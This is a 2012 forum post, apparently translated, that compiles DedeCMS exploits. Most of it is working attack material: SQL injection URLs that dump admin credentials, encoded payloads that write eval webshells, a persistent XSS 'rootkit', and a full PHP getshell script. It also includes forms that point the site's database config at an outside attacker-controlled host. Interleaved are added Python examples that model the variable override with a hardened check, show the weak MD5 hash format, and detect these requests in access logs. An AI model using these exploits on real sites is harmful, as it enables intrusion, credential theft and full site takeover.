DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14 | Views: 3013 | Replies: 0

Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item; in the local address field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php with password xiao, producing a one-line webshell directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below you then visit, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// Usage banner when no aid argument is given
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// $exp is only the first response line (see Getshell); "OK" past offset 12 means a "200 OK" status line
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // POST body: doaction points back at mytag_js.php and the _COOKIE[GLOBALS][cfg_*] fields override the DB config
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return '';
    }
    fwrite($ock,$data);
    // Reads and returns only the first line of the response (the HTTP status line)
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
Prerequisite: the backend path must be known first.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert a row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
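The variable override that both the script above and the _COOKIE[GLOBALS][cfg_*] form fields rely on, modelled in Python as an added example that is not part of the original post: register_request_vars reproduces how request keys are auto-registered as globals, and the hardened path rejects the key prefixes that later DedeCMS releases block (the regex, the function names and the configuration values are my own assumptions and constructed data).

```python
import re

# Request keys that must never be auto-registered as globals. Modelled on the
# prefix check that later DedeCMS releases added to include/common.inc.php;
# the exact pattern here is an assumption, not a quote of the project source.
BLOCKED_KEY = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def register_request_vars(ns, hardened):
    """Model of register_globals-style auto-registration of request data.

    `ns` stands in for PHP's global symbol table: it holds the site's cfg_*
    values plus the request arrays _GET, _POST and _COOKIE. Every key of each
    request array is written into ns, in that order. A key named GLOBALS is
    merged into ns itself (PHP's $GLOBALS superglobal), and each array is
    read when its turn comes, so an earlier array can already have replaced it.
    """
    for source in ("_GET", "_POST", "_COOKIE"):
        for key, value in list(ns.get(source, {}).items()):
            if hardened and BLOCKED_KEY.match(key):
                raise ValueError("Request var not allow: " + key)
            if key == "GLOBALS" and isinstance(value, dict):
                ns.update(value)
            else:
                ns[key] = value
    return ns


def fresh_namespace(post):
    """Constructed server environment: its own DB config plus one POST body."""
    return {
        "cfg_dbhost": "localhost",
        "cfg_dbuser": "dede",
        "cfg_dbpwd": "server-secret",
        "cfg_dbname": "dedecms",
        "_GET": {},
        "_POST": post,
        "_COOKIE": {},
    }


# Constructed POST body in the shape of the form above: the field name
# _COOKIE[GLOBALS][cfg_dbhost] is parsed by PHP into nested arrays.
OVERRIDE_POST = {
    "doaction": "/plus/mytag_js.php?aid=1",
    "_COOKIE": {
        "GLOBALS": {
            "cfg_dbhost": "attacker-db.example",
            "cfg_dbuser": "exploit",
            "cfg_dbpwd": "x",
            "cfg_dbname": "exploit",
            "cfg_dbprefix": "dede_",
        }
    },
    "nocache": "true",
}


def effective_dbhost(hardened):
    """The DB host the page would connect to, or the rejection message."""
    try:
        ns = register_request_vars(fresh_namespace(dict(OVERRIDE_POST)), hardened)
        return ns["cfg_dbhost"]
    except ValueError as exc:
        return str(exc)
```

In the unhardened run the POST first replaces the _COOKIE array, then the GLOBALS key inside it overwrites cfg_dbhost, which is exactly why the form needs no real cookie.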

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our specially crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, which gives the 20-character MD5; to obtain the 16-character MD5, remove 3 more from the front and 1 from the end.
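The hash format described in the last sentence, worked through in Python as an added example that is not part of the original post (the slicing offsets follow the post; the function names and the verification helper are my own): it derives both forms and shows that the 16-character result is the ordinary 16-character MD5, which is why a leaked dede_admin hash is no stronger than an unsalted MD5.

```python
import hashlib
import hmac


def dede_hash20(password: str) -> str:
    """DedeCMS admin-table form: the 32-hex-digit MD5 with the first 5 and
    the last 7 digits removed, i.e. digest[5:25] (20 characters)."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    return digest[5:-7]


def hash20_to_hash16(hash20: str) -> str:
    """20-character form to the conventional 16-character MD5: drop 3 more
    at the front and 1 at the end, which lands on digest[8:24]."""
    if len(hash20) != 20:
        raise ValueError("expected a 20-character DedeCMS hash")
    return hash20[3:-1]


def md5_16(password: str) -> str:
    """Plain 16-character MD5 (middle of the digest), for cross-checking."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def verify_dede_password(candidate: str, stored: str) -> bool:
    """Defender-side check of a candidate password against a stored hash in
    either the 20- or the 16-character form, using constant-time comparison.
    Useful when auditing which accounts still sit on this unsalted scheme."""
    stored = stored.lower()
    if len(stored) == 20:
        return hmac.compare_digest(dede_hash20(candidate), stored)
    if len(stored) == 16:
        return hmac.compare_digest(md5_16(candidate), stored)
    raise ValueError("unsupported stored-hash length")
```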

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric-overflow error in a field, combined with DEDECMS writing the database error message into a PHP file whose header performs no validation.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following shows that the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the address in the form's action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the message from step 2 means the file trojan was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
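Access-log detection for the request shapes collected in this post, as an added example that is not part of the original post: the rule set, the combined-log parser and the sample log lines are all constructed here (the source IPs are documentation addresses), and each rule is matched against the URL-decoded request target so encoded payloads such as %3Cscript and %2A/ are caught.

```python
import re
from urllib.parse import unquote

# Request shapes taken from the vulnerabilities listed in this post. Each rule
# runs against the URL-decoded request target; a method, when given, limits
# the rule to that HTTP verb.
RULES = [
    ("variable-override", None,
     re.compile(r"(_COOKIE|_POST|_GET)\[GLOBALS\]|GLOBALS\[cfg_", re.I)),
    ("gotopage-xss", None,
     re.compile(r"login\.php\?.*gotopage=.*<script", re.I)),
    ("advancedsearch-sql", None,
     re.compile(r"advancedsearch\.php\?.*\bsql=\s*select\b", re.I)),
    ("rss-injection", None,
     re.compile(r"rss\.php\?.*_Cs\[", re.I)),
    ("edit_face-delete-traversal", None,
     re.compile(r"edit_face\.php\?.*dopost=delold.*\.\./", re.I)),
    ("carbuyaction-lfi", None,
     re.compile(r"carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    ("digg_frame-errorlog-injection", None,
     re.compile(r"digg_frame\.php\?.*mid=\*/", re.I)),
    ("plus-union-select", None,
     re.compile(r"(feedback_js|infosearch)\.php\?.*union\s+select", re.I)),
    ("mytag_js-post", "POST",
     re.compile(r"mytag_js\.php", re.I)),
]

# Combined log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def classify(line):
    """Return the first matching rule name for one access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))  # one decoding pass: %2A -> *, %3C -> <
    for name, method, pattern in RULES:
        if method and m.group("method") != method:
            continue
        if pattern.search(target):
            return name
    return None


def scan(lines):
    """List of (rule, source ip, raw target) for every flagged line."""
    hits = []
    for line in lines:
        rule = classify(line)
        if rule:
            m = LOG_RE.match(line)
            hits.append((rule, m.group("ip"), m.group("target")))
    return hits


# Constructed sample log; the targets mirror the requests shown in this post.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 5120
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%201%23'][0]=1 HTTP/1.1" 500 321
198.51.100.9 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2210
198.51.100.9 - - [18/Oct/2012:10:43:30 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.77 HTTP/1.1" 302 0
192.0.2.44 - - [18/Oct/2012:10:44:02 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 4099
192.0.2.44 - - [18/Oct/2012:10:44:10 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88
192.0.2.44 - - [18/Oct/2012:10:44:15 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 77
192.0.2.44 - - [18/Oct/2012:10:44:20 +0800] "GET /plus/digg_frame.php?id=1024e1024&mid=%2A/CONSTRUCTED;?%3E HTTP/1.1" 200 13
192.0.2.44 - - [18/Oct/2012:10:44:25 +0800] "GET /plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 640
192.0.2.44 - - [18/Oct/2012:10:44:40 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 2
10.0.0.7 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9120
""".splitlines()


def sample_hits():
    return scan(SAMPLE_LOG)
```

POST bodies are not in an access log, so the mytag_js.php and select_soft_post.php rules can only key on the verb and the script name; pair this with a web-application log or WAF record to see the _COOKIE[GLOBALS] and cfg_* fields themselves.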